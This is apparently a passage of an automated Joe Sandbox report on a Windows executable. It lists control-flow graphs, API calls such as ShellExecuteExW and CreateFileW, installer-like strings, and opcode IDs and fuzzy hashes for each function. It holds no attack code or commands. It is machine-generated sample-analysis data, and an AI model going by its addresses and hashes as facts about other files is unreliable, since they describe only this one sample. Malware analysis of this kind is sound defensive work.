                                      control_flow_graph 1911 7ff65a381880-7ff65a381909 call 7ff65a3814d8 1914 7ff65a38190b-7ff65a38192f call 7ff65a3817e8 RaiseException 1911->1914 1915 7ff65a381934-7ff65a381951 1911->1915 1921 7ff65a381b38-7ff65a381b55 1914->1921 1917 7ff65a381966-7ff65a38196a 1915->1917 1918 7ff65a381953-7ff65a381964 1915->1918 1920 7ff65a38196d-7ff65a381979 1917->1920 1918->1920 1922 7ff65a38197b-7ff65a38198d 1920->1922 1923 7ff65a38199a-7ff65a38199d 1920->1923 1935 7ff65a381b09-7ff65a381b13 1922->1935 1936 7ff65a381993 1922->1936 1924 7ff65a381a44-7ff65a381a4b 1923->1924 1925 7ff65a3819a3-7ff65a3819a6 1923->1925 1929 7ff65a381a4d-7ff65a381a5c 1924->1929 1930 7ff65a381a5f-7ff65a381a62 1924->1930 1926 7ff65a3819bd-7ff65a3819d2 LoadLibraryExA 1925->1926 1927 7ff65a3819a8-7ff65a3819bb 1925->1927 1933 7ff65a381a29-7ff65a381a32 1926->1933 1934 7ff65a3819d4-7ff65a3819e7 GetLastError 1926->1934 1927->1926 1927->1933 1929->1930 1931 7ff65a381a68-7ff65a381a6c 1930->1931 1932 7ff65a381b05 1930->1932 1939 7ff65a381a9b-7ff65a381aae GetProcAddress 1931->1939 1940 7ff65a381a6e-7ff65a381a72 1931->1940 1932->1935 1945 7ff65a381a3d 1933->1945 1946 7ff65a381a34-7ff65a381a37 FreeLibrary 1933->1946 1941 7ff65a3819e9-7ff65a3819fc 1934->1941 1942 7ff65a3819fe-7ff65a381a24 call 7ff65a3817e8 RaiseException 1934->1942 1943 7ff65a381b15-7ff65a381b26 1935->1943 1944 7ff65a381b30 call 7ff65a3817e8 1935->1944 1936->1923 1939->1932 1950 7ff65a381ab0-7ff65a381ac3 GetLastError 1939->1950 1940->1939 1947 7ff65a381a74-7ff65a381a7f 1940->1947 1941->1933 1941->1942 1942->1921 1943->1944 1953 7ff65a381b35 1944->1953 1945->1924 1946->1945 1947->1939 1951 7ff65a381a81-7ff65a381a88 1947->1951 1955 7ff65a381ada-7ff65a381b01 call 7ff65a3817e8 RaiseException call 7ff65a3814d8 1950->1955 1956 7ff65a381ac5-7ff65a381ad8 1950->1956 1951->1939 1957 7ff65a381a8a-7ff65a381a8f 1951->1957 1953->1921 1955->1932 1956->1932 1956->1955 1957->1939 1960 7ff65a381a91-7ff65a381a99 1957->1960 1960->1932 1960->1939
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                      • String ID: H
                                      • API String ID: 3432403771-2852464175
                                      • Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                      • Instruction ID: 532014fb2a2a4c0899b92d04cb56276a3067135a16f1060857dd3261b01accfa
                                      • Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                      • Instruction Fuzzy Hash: 1D914622A06B128AEB50CFA5D9846AC73E5FF48B98F494579DE0DE7B54EF38E445C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37F460 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1991 7ff65a37f460-7ff65a37f4a3 1992 7ff65a37f4a9-7ff65a37f4e5 call 7ff65a383c70 1991->1992 1993 7ff65a37f814-7ff65a37f839 call 7ff65a351fa0 call 7ff65a3822a0 1991->1993 1999 7ff65a37f4ea-7ff65a37f4f1 1992->1999 2000 7ff65a37f4e7 1992->2000 2002 7ff65a37f4f3-7ff65a37f4f7 1999->2002 2003 7ff65a37f502-7ff65a37f506 1999->2003 2000->1999 2006 7ff65a37f4fc-7ff65a37f500 2002->2006 2007 7ff65a37f4f9 2002->2007 2004 7ff65a37f50b-7ff65a37f516 2003->2004 2005 7ff65a37f508 2003->2005 2008 7ff65a37f51c 2004->2008 2009 7ff65a37f5a8 2004->2009 2005->2004 2006->2004 2007->2006 2010 7ff65a37f522-7ff65a37f529 2008->2010 2011 7ff65a37f5ac-7ff65a37f5af 2009->2011 2012 7ff65a37f52b 2010->2012 2013 7ff65a37f52e-7ff65a37f533 2010->2013 2014 7ff65a37f5b7-7ff65a37f5ba 2011->2014 2015 7ff65a37f5b1-7ff65a37f5b5 2011->2015 2012->2013 2016 7ff65a37f565-7ff65a37f570 2013->2016 2017 7ff65a37f535 2013->2017 2018 7ff65a37f5e0-7ff65a37f5f3 call 7ff65a36636c 2014->2018 2019 7ff65a37f5bc-7ff65a37f5c3 2014->2019 2015->2014 2015->2018 2020 7ff65a37f575-7ff65a37f57a 2016->2020 2021 7ff65a37f572 2016->2021 2022 7ff65a37f54a-7ff65a37f550 2017->2022 2036 7ff65a37f618-7ff65a37f66d call 7ff65a3878fc call 7ff65a35129c call 7ff65a363268 call 7ff65a351fa0 2018->2036 2037 7ff65a37f5f5-7ff65a37f613 call 7ff65a371344 2018->2037 2019->2018 2023 7ff65a37f5c5-7ff65a37f5dc 2019->2023 2025 7ff65a37f83a-7ff65a37f841 2020->2025 2026 7ff65a37f580-7ff65a37f587 2020->2026 2021->2020 2027 7ff65a37f537-7ff65a37f53e 2022->2027 2028 7ff65a37f552 2022->2028 2023->2018 2034 7ff65a37f846-7ff65a37f84b 2025->2034 2035 7ff65a37f843 2025->2035 2030 7ff65a37f58c-7ff65a37f592 2026->2030 2031 7ff65a37f589 2026->2031 2032 7ff65a37f543-7ff65a37f548 2027->2032 2033 7ff65a37f540 2027->2033 2028->2016 2030->2025 2040 7ff65a37f598-7ff65a37f5a2 2030->2040 2031->2030 2032->2022 2041 7ff65a37f554-7ff65a37f55b 2032->2041 2033->2032 2042 7ff65a37f84d-7ff65a37f854 2034->2042 2043 7ff65a37f85e-7ff65a37f866 2034->2043 2035->2034 2058 7ff65a37f6c2-7ff65a37f6cf ShellExecuteExW 2036->2058 2059 7ff65a37f66f-7ff65a37f6bd call 7ff65a3878fc call 7ff65a35129c call 7ff65a365b20 call 7ff65a351fa0 2036->2059 2037->2036 2040->2009 2040->2010 2048 7ff65a37f55d 2041->2048 2049 7ff65a37f560 2041->2049 2050 7ff65a37f859 2042->2050 2051 7ff65a37f856 2042->2051 2045 7ff65a37f86b-7ff65a37f876 2043->2045 2046 7ff65a37f868 2043->2046 2045->2011 2046->2045 2048->2049 2049->2016 2050->2043 2051->2050 2060 7ff65a37f7c6-7ff65a37f7ce 2058->2060 2061 7ff65a37f6d5-7ff65a37f6df 2058->2061 2059->2058 2063 7ff65a37f802-7ff65a37f80f 2060->2063 2064 7ff65a37f7d0-7ff65a37f7e6 2060->2064 2065 7ff65a37f6e1-7ff65a37f6e4 2061->2065 2066 7ff65a37f6ef-7ff65a37f6f2 2061->2066 2063->1993 2068 7ff65a37f7fd call 7ff65a38218c 2064->2068 2069 7ff65a37f7e8-7ff65a37f7fb 2064->2069 2065->2066 2070 7ff65a37f6e6-7ff65a37f6ed 2065->2070 2071 7ff65a37f6f4-7ff65a37f6ff call 7ff65a3be188 2066->2071 2072 7ff65a37f70e-7ff65a37f72d call 7ff65a3be1b8 call 7ff65a37fda4 2066->2072 2068->2063 2069->2068 2074 7ff65a37f87b-7ff65a37f883 call 7ff65a387884 2069->2074 2070->2066 2076 7ff65a37f763-7ff65a37f770 CloseHandle 2070->2076 2071->2072 2092 7ff65a37f701-7ff65a37f70c ShowWindow 2071->2092 2072->2076 2098 7ff65a37f72f-7ff65a37f732 2072->2098 2082 7ff65a37f785-7ff65a37f78c 2076->2082 2083 7ff65a37f772-7ff65a37f783 call 7ff65a371344 2076->2083 2090 7ff65a37f7ae-7ff65a37f7b0 2082->2090 2091 7ff65a37f78e-7ff65a37f791 2082->2091 2083->2082 2083->2090 2090->2060 2097 7ff65a37f7b2-7ff65a37f7b5 2090->2097 2091->2090 2096 7ff65a37f793-7ff65a37f7a8 2091->2096 2092->2072 2096->2090 2097->2060 2100 7ff65a37f7b7-7ff65a37f7c5 ShowWindow 2097->2100 2098->2076 2101 7ff65a37f734-7ff65a37f745 GetExitCodeProcess 2098->2101 2100->2060 2101->2076 2102 7ff65a37f747-7ff65a37f75c 2101->2102 2102->2076
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                      • String ID: .exe$.inf$Install$p
                                      • API String ID: 1054546013-3607691742
                                      • Opcode ID: 92268ea336dbf51999bc6770023981d3e865bf47c4d02bd932ccc92627bed11e
                                      • Instruction ID: eadc5d76eff9348cf4adeb44222c2e4101917e2fcd23dcc8cded751f397d281f
                                      • Opcode Fuzzy Hash: 92268ea336dbf51999bc6770023981d3e865bf47c4d02bd932ccc92627bed11e
                                      • Instruction Fuzzy Hash: 09C17D62F19A42D5FB10CB25D94027927A2BF85BC8F0841B5DA4DE77A5DF3CE656C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37F024 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID:
                                      • API String ID: 4119318379-0
                                      • Opcode ID: d034e05cf2ee9d9bbd0f2927dddd7a5f6895878a46b9a51b2d75114531de0697
                                      • Instruction ID: 11f166f08fc1bd8e085ad990259f70cb5848d22017fbd1ecaa52ec2850da5f33
                                      • Opcode Fuzzy Hash: d034e05cf2ee9d9bbd0f2927dddd7a5f6895878a46b9a51b2d75114531de0697
                                      • Instruction Fuzzy Hash: 2C41EE21B14A468AF700CF65E810BAA2761EF89B9CF580275ED0EE7B95CF3DE4498740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35EF20 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c9aeac2a571ab4be581cdbc0b6739a7092aa07dd54f8633a78a72e77e1cc4d8c
                                      • Instruction ID: edf31109be5bc2b32d5e2d4a8c327d54b5dfb46923ccaa5a5dc925032cbb9ec7
                                      • Opcode Fuzzy Hash: c9aeac2a571ab4be581cdbc0b6739a7092aa07dd54f8633a78a72e77e1cc4d8c
                                      • Instruction Fuzzy Hash: C812D062F0974285EB10DBA8D4452AD2372AF497ACF444272DE5CE7AD9DF3CE189C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362480 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3523 7ff65a362480-7ff65a3624bb 3524 7ff65a3624bd-7ff65a3624c4 3523->3524 3525 7ff65a3624c6 3523->3525 3524->3525 3526 7ff65a3624c9-7ff65a362538 3524->3526 3525->3526 3527 7ff65a36253a 3526->3527 3528 7ff65a36253d-7ff65a362568 CreateFileW 3526->3528 3527->3528 3529 7ff65a362648-7ff65a36264d 3528->3529 3530 7ff65a36256e-7ff65a36259e GetLastError call 7ff65a3669cc 3528->3530 3531 7ff65a362653-7ff65a362657 3529->3531 3539 7ff65a3625ec 3530->3539 3540 7ff65a3625a0-7ff65a3625ea CreateFileW GetLastError 3530->3540 3533 7ff65a362659-7ff65a36265c 3531->3533 3534 7ff65a362665-7ff65a362669 3531->3534 3533->3534 3536 7ff65a36265e 3533->3536 3537 7ff65a36266b-7ff65a36266f 3534->3537 3538 7ff65a36268f-7ff65a3626a3 3534->3538 3536->3534 3537->3538 3541 7ff65a362671-7ff65a362689 SetFileTime 3537->3541 3542 7ff65a3626cc-7ff65a3626f5 call 7ff65a3822a0 3538->3542 3543 7ff65a3626a5-7ff65a3626b0 3538->3543 3544 7ff65a3625f2-7ff65a3625fa 3539->3544 3540->3544 3541->3538 3546 7ff65a3626c8 3543->3546 3547 7ff65a3626b2-7ff65a3626ba 3543->3547 3548 7ff65a3625fc-7ff65a362613 3544->3548 3549 7ff65a362633-7ff65a362646 3544->3549 3546->3542 3551 7ff65a3626bc 3547->3551 3552 7ff65a3626bf-7ff65a3626c3 call 7ff65a3520b0 3547->3552 3553 7ff65a362615-7ff65a362628 3548->3553 3554 7ff65a36262e call 7ff65a38218c 3548->3554 3549->3531 3551->3552 3552->3546 3553->3554 3555 7ff65a3626f6-7ff65a3626fb call 7ff65a387884 3553->3555 3554->3549
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3536497005-0
                                      • Opcode ID: f99e3521103fb3de9edb0e7f63cc92576d3a0ea263af1d2a6f50a88c27f1a9b4
                                      • Instruction ID: 52a961822a528c64772d017b5ead8b3a734314f3e5c4afe2d3c44a5bf0958b2a
                                      • Opcode Fuzzy Hash: f99e3521103fb3de9edb0e7f63cc92576d3a0ea263af1d2a6f50a88c27f1a9b4
                                      • Instruction Fuzzy Hash: 8961D062E0868186E7208F69E50136E67B1BB857ACF141334DFADA3BE8DF7DD0948740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37AF94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                      • String ID: ]
                                      • API String ID: 2347093688-3352871620
                                      • Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                      • Instruction ID: 606d868fb4dea18da9979962bb4f92a9e298f2aa936733be8312f687edeb25ce
                                      • Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                      • Instruction Fuzzy Hash: A011B920F0D746C1FA249B12E6452799692AF88BD8F1C01B4DD0DD7B96DF3CFA448600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37AD9C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                      • Instruction ID: 32fcde97ef90b227d7a94557c3ef328a243209fd51759d4291871e463c44e490
                                      • Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                      • Instruction Fuzzy Hash: 76F0FF35F3895682FB50DB24E895A762366FFD0709FE85571E54ED1864DF2CD108CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A379168 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                      • Instruction ID: 08f165eb35bdadb6591337882af09487f5d89be7584bbbde94f67af5d0852395
                                      • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                      • Instruction Fuzzy Hash: 2B01A421F08A4781FE609B21F8157B66395AF99748F5C01B1CD4EE7765EE2CD24DC740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362CA0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3888 7ff65a362ca0-7ff65a362cca 3889 7ff65a362ccc-7ff65a362cce 3888->3889 3890 7ff65a362cd3-7ff65a362cdb 3888->3890 3891 7ff65a362e69-7ff65a362e84 call 7ff65a3822a0 3889->3891 3892 7ff65a362ceb 3890->3892 3893 7ff65a362cdd-7ff65a362ce8 GetStdHandle 3890->3893 3895 7ff65a362cf1-7ff65a362cfd 3892->3895 3893->3892 3897 7ff65a362d46-7ff65a362d62 WriteFile 3895->3897 3898 7ff65a362cff-7ff65a362d04 3895->3898 3901 7ff65a362d66-7ff65a362d69 3897->3901 3899 7ff65a362d06-7ff65a362d3a WriteFile 3898->3899 3900 7ff65a362d6f-7ff65a362d73 3898->3900 3899->3901 3902 7ff65a362d3c-7ff65a362d42 3899->3902 3903 7ff65a362e62-7ff65a362e66 3900->3903 3904 7ff65a362d79-7ff65a362d7d 3900->3904 3901->3900 3901->3903 3902->3899 3905 7ff65a362d44 3902->3905 3903->3891 3904->3903 3906 7ff65a362d83-7ff65a362d98 call 7ff65a35b508 3904->3906 3905->3901 3909 7ff65a362d9a-7ff65a362da1 3906->3909 3910 7ff65a362dde-7ff65a362e2d call 7ff65a3878fc call 7ff65a35129c call 7ff65a35bcb8 3906->3910 3909->3895 3911 7ff65a362da7-7ff65a362da9 3909->3911 3910->3903 3921 7ff65a362e2f-7ff65a362e46 3910->3921 3911->3895 3913 7ff65a362daf-7ff65a362dd9 3911->3913 3913->3895 3922 7ff65a362e5d call 7ff65a38218c 3921->3922 3923 7ff65a362e48-7ff65a362e5b 3921->3923 3922->3903 3923->3922 3924 7ff65a362e85-7ff65a362e8b call 7ff65a387884 3923->3924
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: f75491ea07e48306717d4c7b9b0dd782ca1ca02fd54a3e960da042ac82e522ce
                                      • Instruction ID: 7b4003a7a6f04dda3e89117d86ebfa9c14b8e8e5f745b7829fe1a48531f45674
                                      • Opcode Fuzzy Hash: f75491ea07e48306717d4c7b9b0dd782ca1ca02fd54a3e960da042ac82e522ce
                                      • Instruction Fuzzy Hash: 2351FE62F19A4292FA10CF64E94477A6360FF85B98F480171EA4EE7BA4DF3CE585C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A380360 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                      • String ID:
                                      • API String ID: 3750147219-0
                                      • Opcode ID: cab5017390b7442ea37a5c88792caa3d5e9d8e3083b53e0f89399461d0983a4c
                                      • Instruction ID: d5b7826e4d2bc4c07a6a8b45468e556a7fdfd584c7b0d5b0d8bb5d2c00fa0bae
                                      • Opcode Fuzzy Hash: cab5017390b7442ea37a5c88792caa3d5e9d8e3083b53e0f89399461d0983a4c
                                      • Instruction Fuzzy Hash: F651B162F29B5284FF009BA5D8452AD2322AF45BA8F5806B6DE2CE7BD5DF6CD540C310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A382CEC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
